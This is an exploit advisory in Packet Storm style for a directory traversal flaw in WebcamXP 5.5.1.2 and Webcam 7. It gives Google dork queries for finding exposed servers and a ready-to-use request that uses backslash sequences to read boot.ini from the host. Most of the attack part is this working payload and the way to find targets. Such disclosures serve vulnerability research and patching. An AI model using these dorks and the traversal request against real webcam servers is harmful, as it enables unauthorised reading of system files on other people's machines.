WebcamXP / Webcam7 Directory Traversal

2012-02-23T00:00:00
ID PACKETSTORM:110093
Type packetstorm
Reporter Silent Dream
Modified 2012-02-23T00:00:00

Description

                                        
                                            `# Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability  
# Google Dork: "powered by webcamxp" xhtml css  
# Google Dork: "powered by webcam 7"  
# Date: 2/22/2012  
# Author: Silent Dream  
# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe  
# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe  
# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32  
# Tested on: Windows XP  
# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.  
http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini  
  
  
`